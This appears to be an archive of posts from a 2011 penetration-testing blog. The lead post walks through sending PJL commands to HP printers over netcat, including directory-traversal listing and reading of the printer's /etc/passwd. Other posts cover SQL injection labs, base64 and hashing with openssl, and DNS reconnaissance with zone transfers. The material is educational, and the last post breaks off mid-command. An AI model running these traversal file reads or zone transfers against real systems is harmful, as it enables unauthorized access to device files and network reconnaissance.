Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write-up is about knowing and understanding the basics. A long time ago, you became a “hacker” by being an expert in a subject.
I know people who have forgotten more about VMS than I could ever learn. They became known as VMS “hackers” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some of the IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about, and manipulating those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve no doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has since officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PCs, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested later in this article showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain.)
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • HTTPS
  • Telnet
  • SNMP
  • PCL / PJL
HTTP and HTTPS are served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. OK, maybe not most, but those that have an understanding of security know that HTTPS is better than HTTP, so they usually turn off communications on Port 80 in favor of Port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the password is usually the same over Telnet as it is in the EWS. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later.).

But what’s interesting is PJL, the Printer Job Language. An extension of PCL (the Printer Command Language, the way print jobs are communicated to printers), PJL is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, supports the ability to password protect it (with a separate password from EWS/Telnet) so you can actually protect the printing stream (a little). The following examples, however, were successfully run on an HP printer without the PJL password set. But, let’s face facts: nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character. I highly suggest you use Notepad++ in order to craft the ASCII commands. Regular Notepad just won’t cut it.  And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). This will send the commands in a “raw”, unadulterated way so the printer will interpret the commands correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” is:

[ESC]%-12345X @PJL RDYMSG DISPLAY="Igor!!!!"
[ESC]%-12345X

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to accomplish the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading:



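Speaking of the Linux side: here’s a hedged sketch of how you could skip Notepad++ entirely and build the file straight from a shell, using printf to emit the raw ESC byte (printf handles the escape more reliably than plain echo; the printer IP in the commented-out last line is just a placeholder):

```shell
# Build the PJL job with a literal ESC (0x1b) byte via printf's \033 escape.
# (%% prints a literal percent sign.)
printf '\033%%-12345X @PJL RDYMSG DISPLAY="Igor!!!!"\n\033%%-12345X' > pjl1.txt

# Sanity-check that the file really starts with the ESC byte:
od -An -tx1 -N1 pjl1.txt    # the lone byte shown should be 1b

# Then fire it at the JetDirect port, same as the Windows "type" pipe:
# cat pjl1.txt | nc -v -v 192.0.2.50 9100
```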
Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what, you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t), we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999
[ESC]%-12345X

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
. TYPE=DIR
.. TYPE=DIR
hp TYPE=DIR
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247
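Once you’ve captured a listing like that, a little awk makes it easy to pick out just the files worth grabbing. A quick sketch (the here-doc below merely stands in for netcat output you’ve saved to a file):

```shell
# Pretend this is the FSDIRLIST response we saved from netcat:
cat > dirlist.txt <<'EOF'
. TYPE=DIR
.. TYPE=DIR
hp TYPE=DIR
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
EOF

# Print the name of every FILE entry, skipping the directories:
awk '$2 == "TYPE=FILE" { print $1 }' dirlist.txt
# prints: starttab, passwd, ttys (one per line)
```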

Using the PJL commands to interact with the filesystem is not a hack; it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000
[ESC]%-12345X

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23
root::0:0::/:/bin/dlsh
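Since you’ll probably want to grab more than one file, the FSUPLOAD request is worth wrapping in a tiny shell function. A sketch (the function name and the fixed SIZE are my own inventions; bump SIZE to at least the size FSDIRLIST reported for the file):

```shell
# Emit a raw PJL FSUPLOAD job for a given path and byte count.
pjl_fsupload() {
    # $1 = PJL path (drive-relative, with traversal), $2 = bytes to request
    printf '\033%%-12345X@PJL FSUPLOAD NAME="%s" OFFSET=0 SIZE=%s\n\033%%-12345X' "$1" "$2"
}

pjl_fsupload '0:\\..\\..\\..\\etc\passwd' 22000 > grab-passwd.pjl
# cat grab-passwd.pjl | nc -v -v <IP Address of Printer> 9100
```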

Conclusion
Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with printers. If you want to learn more about PJL commands, go ahead and google “PJL reference manual”; you’ll get a number of hits listing out PDFs containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion, and your expert knowledge of this subject should help you educate others who may not quite understand the claims being made regarding the vulnerability of HP printers.

Sunday, November 6, 2011

Security vs. Compliance: When is Too Little Not Enough?

We’ve talked a bit about offensive-type security: knowing how to attack a system is all well and good. A penetration tester should know as many of the different ways an attacker can penetrate a system as possible, so that they can help build defenses to slow down the bad guys. This is an integral aspect of Information Security and one that we focus on here at “Hack On A Dime” very much.


However, there’s more to Information Security than just knowing how to attack and defend. Management worth their salt should be able to view their enterprise and visualize how their security plan (as a whole) protects their network. This skill is crucial to being able to adapt to new technologies and still protect information. And it’s one of the skills that my team and I pride ourselves on having built up over the past few years of working together.

Recently, I had a conference call with a client regarding one aspect of Information Security Management: software baselines & procedures. The client had been assigned the task of reviewing current procedures for building servers. They had outlined settings such that, when a system administrator builds a new RedHat Enterprise Linux 6 server, following the procedures produces a server that is compliant with current standards. Note that I say “compliant with current standards”.

It is this aspect of Information Security Management that provides a foundation for measuring vulnerability exposure. Notice how I didn’t say it provides metrics for how secure you are. Why not? Because it doesn’t. Being able to provide visibility into your exposure window for certain vulnerabilities is only one part of an all-encompassing Information Security plan.

This conference call shed light on one of the most erroneous aspects of Information Security mis-management and it’s a topic I thought you, as a penetration tester, and future Information Security Management member, might benefit from hearing about.

Compliance and Standards

The client started the conference call by displaying to all on the call their web-based standards application and first going over some of the more “stringent” standards that they’d drafted up.

And it is here where I, as a consultant, needed to tread lightly, because here, as the saying goes, there be dragons. The “stringent” standards the client boasted about did, in fact, contain strong terms such as “users will implement encrypted protocols such as ssh or sftp” and yet, at the same time, contained such wishy-washy terminology as “when the infrastructure can support it”. It is wishy-washiness such as this that gives the very human system administrators and users a way out of any restrictions the standards may dictate.

Therefore, the restrictions have lost their teeth. The Standards are no longer enforceable by any party given the role of enforcer. No auditor, no manager can easily enforce these standards if the rule itself contains a phrase that states “you must do this” … “if you can”. Because the user will claim they can’t. Always.

And yet, I remained quiet. After all, they are the client and the client is always right.

Putting aside the “wishy-washy” verbiage with which the client’s Standards were crafted, let’s look at what they actually state. The client was required to be compliant with the Payment Card Industry Data Security Standard, or PCI-DSS. The client’s Standards & Policies reflected their desire to be compliant with the PCI Data Security Standards. The restrictions that the Standards dictated demonstrated a desire for their systems to be less wild and insecure and more in line with other systems that are compliant with PCI DSS requirements.

The task at hand was to review the procedures for building new servers and ensure they were still compliant with PCI DSS requirements. And while the procedures did a good job of mapping out compliance to the PCI DSS requirements, it nagged at my very being that what was being laid out for this client as a baseline for building secure servers was, in fact, a minimal set of security settings, at best.

“Real World” Security vs “Just Okay” Compliance

The client’s standards spoke of setting warning banners to proclaim loudly, “Attacker! This computer is not your computer! By accessing it, you may be prosecuted!”. The client’s standards spoke of turning off telnet and FTP (unencrypted protocols that any network sniffer could capture) and ensuring that SSH and SFTP (encrypted protocols) were turned on.

However, basic “real world” security settings were completely and utterly ignored. For instance, since it is extremely well known that SSH version 1 has many vulnerabilities, it is a basic “real world” defense to configure all SSH servers to explicitly forbid fallback to SSH V1 communications. This is a quick setting that would take a moment to configure on any current SSH server.
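For the record, that quick setting is a one-line directive in OpenSSH’s sshd_config. A sketch, run against a scratch copy rather than the live config:

```shell
# Pin sshd to protocol 2 only (no SSHv1 fallback).
# On a real server you'd edit /etc/ssh/sshd_config and restart sshd;
# here we just demonstrate against a scratch file.
printf 'Protocol 2\n' > sshd_config.test

# Verify the directive is in place:
grep -x 'Protocol 2' sshd_config.test

# From the outside, a legacy "ssh -1 user@host" attempt should then be refused.
```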

So, for all the loud proclamations via warning banner, nearly every server that answered SSH allowed a client to “downgrade” its communications to SSH V1. So, very nearly all their SSH servers were vulnerable to attack via exploits that were over ten years old.

When is Too Little Not Enough?

In this conference call, I pointed out to the client that their “stringent” Standards were somewhat lacking in strength when it came to “real world” security. Very gently, I illustrated a few of the settings that the Center for Internet Security outlines in their Security Benchmarks and asked if the client wanted my team and me to review the procedures for compliance and, at the same time, review the CIS Security Benchmarks to produce a list of deltas that could be implemented to bring their baseline procedures up to a more secure plateau.

I was told “thank you, but no.”

And herein lies the problem with most corporate security plans. This is the crux of why even the most “secure” facilities fall prey to attackers. Why do corporations who should know better get hacked on a nearly monthly basis? Because the corporate sector touts how “secure” it is by confusing the concept of security with the concept of compliance.

The two concepts are so incredibly different as to be very nearly two separate thought processes.

Conclusion

What Information Security Management should realize is this simple concept: Being compliant with regulations and requirements should be a by-product of implementing a good, strong, security plan. All corporate entities should do the most they can to implement strong security and ensure that a subset of THAT security provides compliance with regulations.

Unfortunately, too many corporations ensure that they have done the least they can possibly do (the bare minimum) to be compliant and constantly ignore the challenges they need to overcome to be truly as defensive as they possibly can when it comes to security.

If you’re going to be entering into the Information Security Management realm, understand that you need to be the preacher when it comes to implementing security over compliance.

Saturday, July 30, 2011

Scanning an Internal Network Through A Firewall

OK - so this post's a quickie because a) the last 2 posts have totaled nearly 12 pages of source material and I need to focus on the new novel this weekend and b) it's so early on a Saturday morning that I've yet to grab a mug of "Jamaica Me Crazy" coffee. Thoughts aren't quite as coherent without Java.

So here goes:

I stumbled across these posts this morning and while I haven't yet had time to try them, the write-ups seem solid.

According to this article, there are 2 new ways to implement an Idle scan (or variations of an Idle scan) in order to enumerate targets ON THE INSIDE of a firewall. This means that we, the attacker, don't have to be able to route to the victim/target in order to enumerate ports. The zombie we pick is the one that has to route, so in some cases, that can be the firewall or outlying router itself.

Are the terms "zombie" and "victim" not all that familiar to you? Don't quite remember what an "Idle scan" is? No problem.

Get caught up on traditional Idle scans here: http://www.networkuptime.com/nmap/page3-16.shtml

Then, check out this white paper detailing the 2 new ways to Idle scan here: http://people.csail.mit.edu/costan/readings/usenix_papers/Ensafi.pdf

And, just in case your head is spinning from that and you need the breakdown, check out this blog entry (http://www.malwarecity.com/community/index.php?app=blog&module=display&section=blog&blogid=23&showentry=7600) where MalwareCity has taken the time to explain them. 

Personally, I think scan #2 (SYN cache scan) is the way to go because the first option is dependent on having a FreeBSD box in the victim/target's DMZ or at least in the victim/target's external IP space. Chances of that are not exactly tiny, but they are limited. And why limit yourself when you have the option to use the SYN cache scan?


Friday, July 29, 2011

Browbeating Web Apps W/Their Own Javascript

We’ve talked a bit about reconnaissance, NMAP and SQL Injection. But sometimes, our jobs aren’t strictly limited to demonstrating how vulnerable an application is to known exploits. Sometimes, we get the chance to demonstrate how vulnerable a web application is just by existing.
An administrator or developer can put in defense after defense and make it so we have to jump through hoops in order to get to known exploits, and that’s good. Defense-in-depth is a great concept and it should be used as a building block of any sound security plan. However, if we can develop an understanding of how an application works well enough (and I mean mind-melding like Spock with that rock creature—you know, the one with the silicon eggs *shudder* ), if we can really get to know an app and understand the code in front of us in a web page, then we should be able to test its security without some of the tools we’ve talked about before.
I’m going to demonstrate how, with the help of a web proxy, we can manipulate an application’s code so much so that we can see information we weren’t supposed to see, gain administrative privileges, even dump a database.
Now, all you critics out there: these are extremely basic examples of how to manipulate javascript and HTML to get us escalated access to data. These are not meant to be elaborate examples by any means, and they aren’t.
But they should serve as a great stepping stone for your education and give you a place to start to learn how to do this.

Ready to begin?

The Web Application

The following examples, while simplistic in nature, are real. They have been found out in the field. I can’t divulge where, but I can divulge how to exploit these loops of logic.

Javascript in the URL bar

Now, there are a couple of different ways to skin this particular cat. Some people would take the resulting URL from this particular manipulation and just copy and paste it into a new browser window and change the URL. This is ordinarily a fine idea. However, SOMEtimes you find a sneaky programmer who has figured out that they need to deny direct URL access if it wasn’t the result of a Javascript call. So, the only way to do this particular trick is by manipulating the javascript that we are given in the first place.

First, we log into our Web Application (a management portal, for this particular example) and we are presented with this screen:



Thursday, July 21, 2011

Trying SQL Injection on Your Own

Hey, if after our last couple of posts, you feel like your SQL fu is up to snuff and want to get your hands on a real vulnerable web app that maybe doesn't have the answers all leaked out, then check this out.


Head on over to http://csis.pace.edu/~lchen/sweet and download the vulnerable app they're hosting in VMware or VirtualBox format. Stand up that server and follow these two guides, 5 - Security Testing and 6 - Vulnerability Management.

The Ubuntu web server is running BadStore, which you can alternatively register for and download at http://www.badstore.net. Either way, you're going to be able to run SQL Injection and XSS attacks against this web app and database.

Try it out!

Wednesday, July 20, 2011

Manual SQL Injection without Tools


Last post, we stood up a VM with Damn Vulnerable Web App and used an automated tool, sqlmap, to audit the vulnerable URL and gather up data for us from the database that we ordinarily shouldn't be privy to.

 

This time around, I wanted to talk about basic SQL queries and how they are used in legitimate applications. And then later on, I wanted to build on this to demonstrate to you, the reader, what we can do without automated tools. We'll roll up our sleeves and grab a wrench and jam it into a keyhole to gather data from the database.
One thing I feel I must get off my chest: A lot of people want to learn how to hack. And the simple fact of the matter is: you can't. You can't learn to hack anything. The reason there are great hackers out there is because they became such experts in a particular topic or topics that they knew every which way to use, abuse, torture and amuse a system. If you check out Darknet's site, they've posted their motto: “Don't Learn to HACK – Hack to LEARN”. This is the truest statement I can offer you, the reader. In order to be one of the best hackers, you need to know everything you can about a subject. Will you ever know everything about that subject? Unlikely. I consider myself a UNIX/Linux expert and I learn something new nearly every day. (Albeit, I learn mostly because I've pounded the keyboard and found some new key combo I never knew existed till I got mad but whatcha gonna do? :) )
I don't expect you to become an expert overnight but hopefully this introduction will solidify a few database concepts for you about how legitimate SQL queries help lead to SQL Injection.
Ready to begin?


SQL Queries – Building the SQL Database
To demonstrate to you how SQL queries work, I thought it would be best to illustrate some simple queries first.
To do this, we'll need a mysql server and a mysql client. Luckily, if we're using Ubuntu, these utilities are never far away. Run the following command to install mysql and then we'll start creating databases.
sudo apt-get install mysql-server mysql-client-core-5.1
During install, you may be asked to provide a password for the root user to access the database. Don't use your normal password or the password you used to set up root's account in the OS, if you've done that. Just set up a fairly secure password that you'll remember later. Why? Cuz you'll need it. Trust me.
Once you're installed, go ahead and connect to the mysql server by issuing the following command at the command prompt:
user@workstation:~$ mysql -h localhost -u root -p
Enter password:
(you will be brought to a mysql prompt like so)
mysql>
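To give you a taste of where we're headed, here's the flavor of statement you can try from that mysql> prompt. This is just a hedged preview; the database name, table name and values below are examples I've made up for illustration:

```sql
-- Create a scratch database and a users table to play with.
CREATE DATABASE hackademy;
USE hackademy;

CREATE TABLE users (
    id       INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(32),
    password VARCHAR(32)
);

INSERT INTO users (username, password) VALUES ('charlie', 'winning');

-- The kind of query a login form runs behind the scenes, and exactly
-- the kind of statement SQL Injection abuses:
SELECT * FROM users WHERE username = 'charlie' AND password = 'winning';
```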

Monday, July 18, 2011

Sqlmap Introduction – SQL Injection Walkthrough


In prior posts, we've discussed performing reconnaissance work on targets. We've talked about using FOCA, Maltego and other tools (including some that simply query how the Internet works) and how to gather information from targets about them.


Starting today, we're going to discuss the practical application of some more technical tools. Tools that will provide for us information on targets that will help us determine what our attack vector is going to be for that target.

In this particular write up, we're going to explore the specifics of finding a web application and determining if it's vulnerable through SQL injection. Once we determine that it is, indeed, vulnerable, we're going to use an automated tool called “sqlmap” to help us gather data from the database. I think it's important to also discuss how to manually get to the same point, but that's for another blog post. We'll follow up and show you manual SQL injection in our next post.

So you can follow along at home, let's talk a little about what I've got set up in my lab and where to get the software I'm using.

Setting Up The Lab – Vulnerable Web Application
Now, in order to test a web application for vulnerabilities, you're going to need to deploy a vulnerable web application.

Come back to this blog when you've written up a nice PHP/mysql web application that is chock full of vulnerabilities for us to exploit. Go on, I'll wait.

What's that? You don't feel like writing your own web application just so you can test it later? Fine.

Lucky for us, there are plenty of folks who have done just that so that we don't have to. The Internet has dozens of bootable Linux distributions out in the world that provide for us, the security researcher, the hacker, call-us-what-you-will, an environment that contains vulnerable applications. All we need to do is grab one, boot it up and start testing away.

For my lab, I settled on “Damn Vulnerable Web Application”, which you can find more info on at their web site (http://www.dvwa.co.uk/) and you can download an ISO file of the bootable web app here: (http://www.dvwa.co.uk/DVWA-1.0.7.iso).

You can either burn that ISO file to CD and boot up a physical host or you can create a Virtual Machine in either VMware Player or VirtualBox and have it boot up that way. In either virtual machine software, you can create a machine with a handful of RAM (say 512MB or 1GB) and no hard disk. And then define it to use the ISO file you downloaded for boot. Then you've got a Virtual Machine that's booting a CD/DVD (LiveCD).

Once you've got that set up and running, make sure you know what IP address the machine has (so you know what target you're supposed to be hitting) and then it's time to start scanning!

Wednesday, May 18, 2011

… And Today I Learned Something Cool About OpenSSL

Maybe most of you reading this knew this but I have to admit that I did not. I was reading the WEB SECURITY TESTING COOKBOOK by Paco Hope and Ben Walther and came across a snippet of code where they show that you can use openssl to generate a Base64-encoded blob of data.

I did not know that you could do this with OpenSSL. I also didn’t know that it could do a lot more than that in the encoding/decoding realm.

Check it out:

Decoding a Base64-encoded string


This is why I love using Linux when testing systems. A simple command line can be used over and over again to perform various tasks. Multi-use is key here.

So, let’s say you come across a Base64-encoded blob of data and you want to decode it. Sure, there are plenty of online decoders out there.

Let’s say the blob of data is:

QWRtaW5pc3RyYXRvcjpwYXNzd2QK

Let’s decode this using openssl:

user@host:~#  echo "QWRtaW5pc3RyYXRvcjpwYXNzd2QK" | openssl base64 -d

What do you get?

“Administrator:passwd”

Congratulations! You’ve successfully decoded a username/password pair.

Encoding a Base64-encoded string

Now, let’s say you wanted to be able to manipulate a base64-encoded blob of data and substitute your own information into it. This would entail you encoding your data for insertion. OpenSSL helps there, too.

Let’s say, instead of the username/password pair we discovered up above, we wanted to somehow include our own in that blob of data. Let’s say we wanted to take “Charlie:Winning” into the blob and we need to base64-encode it.

Our data:

“Charlie:Winning”

Encoding it:

user@host:~#  echo "Charlie:Winning" | openssl base64 -e

It will return the following:

Q2hhcmxpZTpXaW5uaW5nCg==

We can then paste this into wherever we’re using that base64-encoded data and we’re ready to rock.

Generating Hashes

Now, let’s say you wanted to be able to generate an MD5 hash of a value, for use in web testing. If you had a value (let’s say “Charlie:Winning” again … ) and you needed to calculate an MD5 hash of that value to append to a string being submitted to a web server, you can accomplish this with OpenSSL, as well.

Generating an MD5 Hash

Our value:

“Charlie:Winning”

Our command to generate an MD5 hash from it:

user@host:~#  echo "Charlie:Winning" | openssl dgst -md5

The result:

428a9b9b18360150aadfe3480189a1f8

Generating a SHA-1 Hash

You can use the same command, changing the digest being used (from -md5 to -sha1), to generate a SHA-1 hash.

Our value:

“Charlie:Winning”

Our command to generate a SHA-1 hash from it:

user@host:~#  echo "Charlie:Winning" | openssl dgst -sha1

The result:

23d7fc7c0819c20d0e83d88bb142537e8f87cc6c

Conclusion

OpenSSL has a thousand different uses and you should try to become as familiar with it as you can. I never realized how many cool things it can do and was always looking around for different tools to perform all these functions above.

Now I know I don’t need all those tools. I’ve got one tool that handles all of that for me.

Sunday, May 15, 2011

Information Gathering using NMAP (and other tools)


That's right. You read that correctly. NMAP, the world's leading port scanner and one of the few tools that should be in every single tester's toolkit, can help you determine a lot of information regarding a target. Host discovery, my friends. NMAP can help you discover lots of information about the hosts on the outward-facing interfaces of a network.


And it does all this without touching the hosts in question.

That's right. You can perform lots of recon with nmap without slinging a single packet at the target hosts.

Previously, we've discussed using Maltego to determine host information (IPs, owner information, etc). Now we're going to do the same from the command line (and do it a mite quicker, too). But first, a little history ...

Setting the Wayback Machine to 199x


The Internet runs mainly because a service, provided by Domain Name System (DNS), translates “friendly names” (like “www.google.com”) to IP addresses (74.125.91.106) and then routes packets around networks until they reach the proper destination. Kind of in the way a phone book translates a “friendly name” like “Bob Smith” to his phone number (212) 555-1212, so you can call him.

Now, that's an overly simplified depiction of the situation, but it works for the purposes of background to our nmap story.

DNS Records

DNS is a fairly easy system to follow along with, even if you're fairly new to Information Technology. DNS simply holds and retrieves records about specific servers in your network range. Typically, it holds the following types of records:

  1. MX Record – Mail Exchange Record – this record indicates what servers are designated as your mail servers
  2. NS Record – Name Server Record – this record indicates what servers are designated as your DNS servers (typically open for UDP 53, at the very least)
  3. A Record – Address Record – this record maps a domain name (or sub-domain name) to an IPv4 address
  4. AAAA Record – Address Record – this record maps a domain name (or sub-domain name) to an IPv6 address
  5. SOA Record – Start of Authority Record – defines global parameters for a zone (domain) – it can define what server is your primary name server (DNS server)
  6. CNAME Record – Canonical Name Record – defines a server's canonical name, rather than any of the aliases it may have within the domain
  7. PTR Record – Pointer Record – provides information for Reverse DNS (see below) – also has become an “authoritative” way to determine spammers around the Internet
  8. SRV Record – Service – provides information for specific services, such as SIP and XMPP (that's right, Jabber/GTalk). For some in-depth information on SRV records and their structure, please take a look at: http://en.wikipedia.org/wiki/SRV_record
Interesting note: MX and SRV records must point to an address record (A or AAAA record).
Reverse DNS

Reverse DNS performs the exact same service, only in reverse. A Reverse DNS lookup (rDNS) determines the domain name (“friendly name”) that is associated with a given IP address.


Using Nslookup

For years, nslookup was the de facto standard tool for interacting with DNS servers and gleaning information. In recent years, however, it has been shown to be a flawed tool with problematic results. A detailed write-up can be found here (http://homepage.ntlworld.com/jonathan.deboynepollard/FGA/nslookup-flaws.html), but the long and short of it is that:

  1. nslookup performs hidden queries
    If you are trying to perform reconnaissance work, you want to be as quiet as possible. By performing hidden queries, nslookup is not exactly a “quiet” utility. In fact, it's rather noisy.
  2. nslookup uses its own internal DNS client
    When performing recon work, you also want to ensure the data you're getting back is accurate. Compared against standard DNS utilities, nslookup's returned data has been found to be inaccurate. This means that, in the long run, you can't really and truly trust what you're seeing from nslookup.

What, then, is a poor pen tester to do?

Use “dig” and “host”, of course. (And nmap, too)

Using host
For in-depth guidance on how to use host, check out its man page here: http://linux.die.net/man/1/host
But let's say, for just a moment, that you wanted to use the “host” command to query a zone for all the name server (ns) records. You would want to use the following command:

host -t ns domain

and let's say you also wanted to query for all the mail server records (mx)

host -t mx domain

and let's say you wanted to … well, you get the idea, right? Just pass a “-t” parameter and use the abbreviation for the type of record you want to retrieve.

host -t srv domain

will provide you with all the SRV records for the domain or sub-domain.
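Those one-off queries are easy to script. Here's a dry-run sketch (example.com is a placeholder domain): it prints each host command it would run, so nothing touches the network; drop the echo to actually query.

```shell
# print the host command for each common record type (dry run);
# remove "echo" to execute the queries for real
for t in ns mx a aaaa soa srv; do
    echo host -t "$t" example.com
done
```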

So, for an example, I ran the host query against isc.org (the Internet Systems Consortium, the folks who maintain BIND):

user@host:~$ host -t mx isc.org
isc.org mail is handled by 10 mx.ams1.isc.org.
isc.org mail is handled by 10 mx.pao1.isc.org.

and then I wanted to find their name servers:

user@host:~$ host -t ns isc.org
isc.org name server ns.isc.afilias-nst.info.
isc.org name server ams.sns-pb.isc.org.
isc.org name server ord.sns-pb.isc.org.
isc.org name server sfba.sns-pb.isc.org.

As you can see from the above, you can very quickly begin to piece together your target hostnames using the information these commands display.

Now, if you want to perform a zone transfer (with host, you can use any one of a number of utils to do this) and grab all the records for yourself, then what you want to do is the following:

host -l domain

or

host -l -v -t any domain

Both of these will attempt a zone transfer: the first returns the host (address) records, while the second returns every record in the zone.
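Once a transfer succeeds, the output is easy to mine. This sketch pulls just the hostnames out of saved host -l output; the printf lines below are stand-ins for real transfer results (example.com and the 192.0.2.x addresses are placeholders):

```shell
# extract the hostname column from captured "host -l" output;
# the printf lines simulate a successful zone transfer
printf '%s\n' \
  'www.example.com has address 192.0.2.10' \
  'mail.example.com has address 192.0.2.25' |
awk '{print $1}' | sort -u
```

That sorted, de-duplicated hostname list makes a handy target file for later scanning.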

Using dig
dig has a lot of switches and parameters you can use to customize its output, but for some in-depth guidance, you can check out dig's man page here: http://linux.die.net/man/1/dig

However, it is most important for you to remember to add on the “+answer” to any dig lookup.

For instance, let's say we wanted to use the dig command to find information about the MX records for “isc.org”. We would want to issue the following query:

dig isc.org MX +answer

This will print out the following output:

user@host:~$ dig isc.org MX +answer
; <<>> DiG 9.7.3 <<>> isc.org MX +answer
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43599
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;isc.org. IN MX
;; ANSWER SECTION:
isc.org. 7200 IN MX 10 mx.pao1.isc.org.
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
;; Query time: 87 msec
;; SERVER: 167.206.245.129#53(167.206.245.129)
;; WHEN: Sun May 15 09:35:31 2011
;; MSG SIZE rcvd: 73


A lot of stuff to sort through, I know! However, if you step back a bit and just take it one piece at a time, you can sort through this easily.

First off: there are a lot of comments. Those comments can be trimmed out by passing dig the “+nocomments” parameter. That would get rid of this part of the output:

; <<>> DiG 9.7.3 <<>> isc.org MX +answer
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43599
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

Then, you probably want to get rid of that last section as well, the part that reads like this:

;; Query time: 87 msec
;; SERVER: 167.206.245.129#53(167.206.245.129)
;; WHEN: Sun May 15 09:35:31 2011
;; MSG SIZE rcvd: 73

This is the “stats” section and can be trimmed from the output of your dig command by passing dig the “+nostats” parameter.

So, really, if we wanted to boil the dig output down to something fairly easy to read we would issue the following command:

dig isc.org MX +nocomments +answer +nostats

and get back:

; <<>> DiG 9.7.3 <<>> isc.org MX +nocomments +answer +nostats
;; global options: +cmd
;isc.org. IN MX
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
isc.org. 7200 IN MX 10 mx.pao1.isc.org.

Easy peasy, no? We now get back very useful output.
We see our query:
;isc.org. IN MX

and the answers we wanted:
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
isc.org. 7200 IN MX 10 mx.pao1.isc.org.

Dig is useful to a pen tester and can even be used to perform a zone transfer, as well. And we all know what happens if you successfully transfer the zone, right? You get all the host records for the domain. And which protocol does that use on port 53? Right, TCP. Where most DNS queries use UDP, zone transfers use TCP.
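With dig, the transfer attempt looks like `dig @ns1.example.com example.com AXFR` (the name server and domain are placeholders here, and any properly configured server will refuse the request). When it does succeed, the records are simple to filter; the printf lines below simulate a captured transfer so the sketch runs offline:

```shell
# keep only the A records from a captured zone transfer;
# the printf lines stand in for real AXFR output
printf '%s\n' \
  'example.com.      3600 IN SOA ns1.example.com. admin.example.com. 1 7200 900 1209600 86400' \
  'www.example.com.  3600 IN A   192.0.2.10' \
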